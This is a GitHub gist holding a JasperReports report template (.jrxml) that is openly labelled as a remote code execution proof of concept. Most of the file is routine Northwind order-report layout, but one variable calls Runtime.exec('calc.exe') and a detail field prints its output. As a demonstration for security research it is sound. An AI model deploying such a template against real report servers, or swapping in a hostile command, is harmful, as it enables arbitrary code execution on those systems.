Created
December 6, 2018 15:14
-
-
Save v-p-b/dd95c72c6924dc1338e78e9d380bd388 to your computer and use it in GitHub Desktop.
JasperReports Remote Code Execution with a single .JRXML file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd"> | |
| <jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30"> | |
| <style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/> | |
| <style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/> | |
| <style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="false"/> | |
| <style name="Comic_Normal" isDefault="false" fontName="Comic Sans MS" fontSize="10" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="COMIC.TTF" pdfEncoding="Identity-H" isPdfEmbedded="true"/> | |
| <style name="Comic_Bold" isDefault="false" fontName="Comic Sans MS" fontSize="10" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="COMICBD.TTF" pdfEncoding="Identity-H" isPdfEmbedded="true"/> | |
| <parameter name="MaxOrderID" class="java.lang.Integer"> | |
| </parameter> | |
| <queryString><![CDATA[SELECT '2008-05-22 12:12:11' as ShippedDate,'HU' as ShipCountry, '2008-05-22 12:12:11' as RequiredDate,'cust' as CustomerID,1337 as OrderID,'jenny' as ShipName,1 as ShipVia,'1234' as ShipPostalCode, '2008-05-22 12:12:11' as OrderDate,'bp' as ShipCity, 'addr' as ShipAddress,1 as EmployeeID,'region' as ShipRegion,10 as Freight]]></queryString> | |
| <field name="ShippedDate" class="java.sql.Timestamp"> | |
| </field> | |
| <field name="ShipCountry" class="java.lang.String"> | |
| </field> | |
| <field name="RequiredDate" class="java.sql.Timestamp"> | |
| </field> | |
| <field name="CustomerID" class="java.lang.String"> | |
| </field> | |
| <field name="OrderID" class="java.lang.Integer"> | |
| </field> | |
| <field name="ShipName" class="java.lang.String"> | |
| </field> | |
| <field name="ShipVia" class="java.lang.Integer"> | |
| </field> | |
| <field name="ShipPostalCode" class="java.lang.String"> | |
| </field> | |
| <field name="OrderDate" class="java.sql.Timestamp"> | |
| </field> | |
| <field name="ShipCity" class="java.lang.String"> | |
| </field> | |
| <field name="ShipAddress" class="java.lang.String"> | |
| </field> | |
| <field name="EmployeeID" class="java.lang.Integer"> | |
| </field> | |
| <field name="ShipRegion" class="java.lang.String"> | |
| </field> | |
| <field name="Freight" class="java.lang.Double"> | |
| </field> | |
| <variable name="FirstLetter" class="java.lang.String" resetType="None"> | |
| <variableExpression><![CDATA[$F{ShipCountry}.substring(0, 1).toUpperCase()]]></variableExpression> | |
| </variable> | |
| <variable name="FreightSumFirstLetterGroup" class="java.lang.Double" resetType="Group" resetGroup="FirstLetterGroup" calculation="Sum"> | |
| <variableExpression><![CDATA[$F{Freight}]]></variableExpression> | |
| </variable> | |
| <variable name="FreightSumCountryGroup" class="java.lang.Double" resetType="Group" resetGroup="CountryGroup" calculation="Sum"> | |
| <variableExpression><![CDATA[$F{Freight}]]></variableExpression> | |
| </variable> | |
| <variable name="FreightSumColumn" class="java.lang.Double" resetType="Column" calculation="Sum"> | |
| <variableExpression><![CDATA[$F{Freight}]]></variableExpression> | |
| </variable> | |
| <variable name="FreightSumPage" class="java.lang.Double" resetType="Page" calculation="Sum"> | |
| <variableExpression><![CDATA[$F{Freight}]]></variableExpression> | |
| </variable> | |
| <variable name="FreightSumReport" class="java.lang.Double" calculation="Sum"> | |
| <variableExpression><![CDATA[$F{Freight}]]></variableExpression> | |
| </variable> | |
| <variable name="DateHighestCountryGroup" class="java.sql.Timestamp" resetType="Group" resetGroup="CountryGroup" calculation="Highest"> | |
| <variableExpression><![CDATA[$F{OrderDate}]]></variableExpression> | |
| </variable> | |
| <variable name="RegionCountCountryGroup" class="java.lang.Integer" resetType="Group" resetGroup="CountryGroup" calculation="Count"> | |
| <variableExpression><![CDATA[$F{ShipRegion}]]></variableExpression> | |
| </variable> | |
| <variable name="myScanner" class="java.util.Scanner" resetType="None"> | |
| <variableExpression><![CDATA[new java.util.Scanner(java.lang.Runtime.getRuntime().exec("calc.exe").getInputStream()).useDelimiter("\\A")]]></variableExpression> | |
| </variable> | |
| <group name="FirstLetterGroup" isStartNewColumn="true" isReprintHeaderOnEachPage="true" minHeightToStartNewPage="200"> | |
| <groupExpression><![CDATA[$V{FirstLetter}]]></groupExpression> | |
| <groupHeader> | |
| <band height="25"> | |
| <rectangle> | |
| <reportElement x="0" y="14" width="270" height="11" forecolor="#ffdddd" backcolor="#ffdddd"/> | |
| <graphicElement/> | |
| </rectangle> | |
| <staticText> | |
| <reportElement mode="Opaque" x="0" y="14" width="120" height="11" forecolor="#ff0000" backcolor="#ffdddd" style="Arial_Italic"/> | |
| <textElement> | |
| <font isUnderline="true"/> | |
| </textElement> | |
| <text><![CDATA[Countries Starting With Letter :]]></text> | |
| </staticText> | |
| <textField> | |
| <reportElement mode="Opaque" x="120" y="14" width="150" height="11" forecolor="#ff0000" backcolor="#ffdddd" style="Arial_Bold"/> | |
| <textFieldExpression class="java.lang.String"><![CDATA[$V{FirstLetter}]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </groupHeader> | |
| <groupFooter> | |
| <band height="15"> | |
| <line> | |
| <reportElement x="0" y="0" width="270" height="1" forecolor="#ff0000"/> | |
| <graphicElement/> | |
| </line> | |
| <staticText> | |
| <reportElement x="0" y="1" width="45" height="11" forecolor="#ff0000" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <text><![CDATA[Count :]]></text> | |
| </staticText> | |
| <textField> | |
| <reportElement x="45" y="1" width="25" height="11" forecolor="#ff0000" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$V{FirstLetterGroup_COUNT}]]></textFieldExpression> | |
| </textField> | |
| <staticText> | |
| <reportElement x="70" y="1" width="140" height="11" forecolor="#ff0000" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <text><![CDATA[Total :]]></text> | |
| </staticText> | |
| <textField pattern="0.00"> | |
| <reportElement x="210" y="1" width="60" height="11" forecolor="#ff0000" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumFirstLetterGroup}]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </groupFooter> | |
| </group> | |
| <group name="CountryGroup" isReprintHeaderOnEachPage="true"> | |
| <groupExpression><![CDATA[$F{ShipCountry}]]></groupExpression> | |
| <groupHeader> | |
| <band height="15"> | |
| <line> | |
| <reportElement x="0" y="14" width="270" height="1"/> | |
| <graphicElement/> | |
| </line> | |
| <textField> | |
| <reportElement x="10" y="2" width="100" height="11" style="Arial_Bold"/> | |
| <textFieldExpression class="java.lang.String"><![CDATA[$F{ShipCountry}]]></textFieldExpression> | |
| </textField> | |
| <textField evaluationTime="Group" evaluationGroup="CountryGroup" pattern="EEE, MMM d, yyyy"> | |
| <reportElement x="170" y="2" width="100" height="11" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.sql.Timestamp"><![CDATA[$V{DateHighestCountryGroup}]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </groupHeader> | |
| <groupFooter> | |
| <band height="15"> | |
| <rectangle> | |
| <reportElement x="0" y="0" width="270" height="11" forecolor="#c0c0c0" backcolor="#c0c0c0"/> | |
| <graphicElement/> | |
| </rectangle> | |
| <staticText> | |
| <reportElement mode="Opaque" x="0" y="0" width="45" height="11" backcolor="#c0c0c0" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <text><![CDATA[Count :]]></text> | |
| </staticText> | |
| <textField> | |
| <reportElement mode="Opaque" x="45" y="0" width="25" height="11" backcolor="#c0c0c0" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$V{CountryGroup_COUNT}]]></textFieldExpression> | |
| </textField> | |
| <staticText> | |
| <reportElement mode="Opaque" x="70" y="0" width="140" height="11" backcolor="#c0c0c0" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <text><![CDATA[Total :]]></text> | |
| </staticText> | |
| <textField pattern="0.00"> | |
| <reportElement mode="Opaque" x="210" y="0" width="60" height="11" backcolor="#c0c0c0" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumCountryGroup}]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </groupFooter> | |
| </group> | |
| <group name="BreakGroup"> | |
| <groupExpression><![CDATA[new Boolean($V{BreakGroup_COUNT}.intValue() > 5)]]></groupExpression> | |
| <groupHeader> | |
| <band height="5"> | |
| </band> | |
| </groupHeader> | |
| <groupFooter> | |
| <band height="5"> | |
| </band> | |
| </groupFooter> | |
| </group> | |
| <title> | |
| <band height="100"> | |
| <elementGroup> | |
| <line> | |
| <reportElement x="0" y="0" width="555" height="1"/> | |
| <graphicElement/> | |
| </line> | |
| </elementGroup> | |
| <textField isBlankWhenNull="true"> | |
| <reportElement x="180" y="5" width="375" height="35" style="Comic_Bold"/> | |
| <textElement textAlignment="Right"> | |
| <font size="22"/> | |
| </textElement> | |
| <textFieldExpression class="java.lang.String"><![CDATA["asdf"]]></textFieldExpression> | |
| </textField> | |
| <staticText> | |
| <reportElement x="180" y="40" width="375" height="15" style="Arial_Italic"/> | |
| <textElement textAlignment="Right"> | |
| <font size="12"/> | |
| </textElement> | |
| <text><![CDATA[(c)2001-2006 by teodord]]></text> | |
| </staticText> | |
| <textField evaluationTime="Report"> | |
| <reportElement x="255" y="55" width="100" height="40"/> | |
| <textElement textAlignment="Justified"/> | |
| <textFieldExpression class="java.lang.String"><![CDATA["There are " + String.valueOf($V{REPORT_COUNT}) + " orders on this report, with a total freight of " + new DecimalFormat("0.00").format($V{FreightSumReport}.doubleValue())]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </title> | |
| <pageHeader> | |
| <band height="45"> | |
| <rectangle> | |
| <reportElement mode="Transparent" x="0" y="0" width="555" height="40"/> | |
| <graphicElement/> | |
| </rectangle> | |
| <staticText> | |
| <reportElement x="0" y="0" width="555" height="25"/> | |
| <textElement textAlignment="Center"> | |
| <font size="18"/> | |
| </textElement> | |
| <text><![CDATA[Northwind Order List]]></text> | |
| </staticText> | |
| <textField> | |
| <reportElement x="0" y="25" width="555" height="15"/> | |
| <textElement textAlignment="Center"> | |
| <font size="10"/> | |
| </textElement> | |
| <textFieldExpression class="java.lang.String"><![CDATA["Max order ID is : " + String.valueOf($P{MaxOrderID})]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </pageHeader> | |
| <columnHeader> | |
| <band height="11"> | |
| <rectangle> | |
| <reportElement x="0" y="0" width="270" height="11" backcolor="#333333"/> | |
| <graphicElement/> | |
| </rectangle> | |
| <staticText> | |
| <reportElement mode="Opaque" x="0" y="0" width="40" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <textElement textAlignment="Center"/> | |
| <text><![CDATA[Order]]></text> | |
| </staticText> | |
| <staticText> | |
| <reportElement mode="Opaque" x="40" y="0" width="145" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <textElement textAlignment="Center"/> | |
| <text><![CDATA[Name, City]]></text> | |
| </staticText> | |
| <staticText> | |
| <reportElement mode="Opaque" x="185" y="0" width="50" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <text><![CDATA[Date]]></text> | |
| </staticText> | |
| <staticText> | |
| <reportElement mode="Opaque" x="235" y="0" width="35" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <text><![CDATA[Freight]]></text> | |
| </staticText> | |
| </band> | |
| </columnHeader> | |
| <detail> | |
| <band height="13"> | |
| <rectangle> | |
| <reportElement x="0" y="4" width="1" height="1" forecolor="#ff0000" backcolor="#ff0000"> | |
| <printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 == 0)]]></printWhenExpression> | |
| </reportElement> | |
| <graphicElement/> | |
| </rectangle> | |
| <textField> | |
| <reportElement x="1" y="0" width="35" height="11"> | |
| <printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 != 0)]]></printWhenExpression> | |
| </reportElement> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$F{OrderID}]]></textFieldExpression> | |
| </textField> | |
| <textField> | |
| <reportElement x="1" y="0" width="35" height="11" forecolor="#ff0000" style="Arial_Bold"> | |
| <printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 == 0)]]></printWhenExpression> | |
| </reportElement> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$F{OrderID}]]></textFieldExpression> | |
| </textField> | |
| <textField isStretchWithOverflow="true"> | |
| <reportElement positionType="Float" x="40" y="0" width="110" height="11"/> | |
| <textElement/> | |
| <textFieldExpression class="java.lang.String"><![CDATA[$V{myScanner}.next()]]></textFieldExpression></textField> | |
| <textField isBlankWhenNull="true"> | |
| <reportElement x="155" y="0" width="25" height="11"/> | |
| <textElement/> | |
| <textFieldExpression class="java.lang.String"><![CDATA[$F{ShipRegion}]]></textFieldExpression> | |
| </textField> | |
| <textField pattern="dd/MM/yyyy"> | |
| <reportElement x="185" y="0" width="50" height="11"/> | |
| <textElement/> | |
| <textFieldExpression class="java.sql.Timestamp"><![CDATA[$F{OrderDate}]]></textFieldExpression> | |
| </textField> | |
| <textField pattern="0.00"> | |
| <reportElement x="235" y="0" width="35" height="11"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Double"><![CDATA[$F{Freight}]]></textFieldExpression> | |
| </textField> | |
| <line> | |
| <reportElement positionType="Float" x="0" y="12" width="270" height="1" forecolor="#808080"/> | |
| <graphicElement pen="Thin"/> | |
| </line> | |
| </band> | |
| </detail> | |
| <columnFooter> | |
| <band height="11"> | |
| <rectangle> | |
| <reportElement x="0" y="0" width="270" height="11" backcolor="#333333"/> | |
| <graphicElement/> | |
| </rectangle> | |
| <staticText> | |
| <reportElement mode="Opaque" x="0" y="0" width="45" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <text><![CDATA[Count :]]></text> | |
| </staticText> | |
| <textField> | |
| <reportElement mode="Opaque" x="45" y="0" width="25" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$V{COLUMN_COUNT}]]></textFieldExpression> | |
| </textField> | |
| <staticText> | |
| <reportElement mode="Opaque" x="70" y="0" width="140" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <text><![CDATA[Total :]]></text> | |
| </staticText> | |
| <textField pattern="0.00"> | |
| <reportElement mode="Opaque" x="210" y="0" width="60" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/> | |
| <textElement textAlignment="Right"/> | |
| <textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumColumn}]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </columnFooter> | |
| <pageFooter> | |
| <band height="30"> | |
| <rectangle> | |
| <reportElement mode="Transparent" x="0" y="5" width="555" height="25"/> | |
| <graphicElement/> | |
| </rectangle> | |
| <staticText> | |
| <reportElement x="5" y="10" width="50" height="20"/> | |
| <textElement textAlignment="Right"> | |
| <font size="14"/> | |
| </textElement> | |
| <text><![CDATA[Count :]]></text> | |
| </staticText> | |
| <textField> | |
| <reportElement x="55" y="10" width="45" height="20"/> | |
| <textElement textAlignment="Right"> | |
| <font size="14"/> | |
| </textElement> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_COUNT}]]></textFieldExpression> | |
| </textField> | |
| <staticText> | |
| <reportElement x="430" y="10" width="50" height="20"/> | |
| <textElement textAlignment="Right"> | |
| <font size="14"/> | |
| </textElement> | |
| <text><![CDATA[Total :]]></text> | |
| </staticText> | |
| <textField pattern="0.00"> | |
| <reportElement x="480" y="10" width="70" height="20"/> | |
| <textElement textAlignment="Right"> | |
| <font size="14"/> | |
| </textElement> | |
| <textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumPage}]]></textFieldExpression> | |
| </textField> | |
| <textField> | |
| <reportElement x="200" y="10" width="75" height="20"/> | |
| <textElement textAlignment="Right"> | |
| <font size="14"/> | |
| </textElement> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_NUMBER}]]></textFieldExpression> | |
| </textField> | |
| <staticText> | |
| <reportElement x="275" y="10" width="5" height="20"/> | |
| <textElement textAlignment="Center"> | |
| <font size="14"/> | |
| </textElement> | |
| <text><![CDATA[/]]></text> | |
| </staticText> | |
| <textField evaluationTime="Report"> | |
| <reportElement x="280" y="10" width="75" height="20"/> | |
| <textElement> | |
| <font size="14"/> | |
| </textElement> | |
| <textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_NUMBER}]]></textFieldExpression> | |
| </textField> | |
| </band> | |
| </pageFooter> | |
| <summary> | |
| <band height="65"> | |
| <rectangle> | |
| <reportElement x="0" y="10" width="555" height="55" backcolor="#c0c0c0"/> | |
| <graphicElement/> | |
| </rectangle> | |
| <staticText> | |
| <reportElement mode="Opaque" x="200" y="15" width="200" height="45" backcolor="#c0c0c0"/> | |
| <textElement textAlignment="Justified"> | |
| <font size="12"/> | |
| </textElement> | |
| <text><![CDATA[That's All Folks! Hei_remind_me_to_put myself up for abduction. END!]]></text> | |
| </staticText> | |
| </band> | |
| </summary> | |
| </jasperReport> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment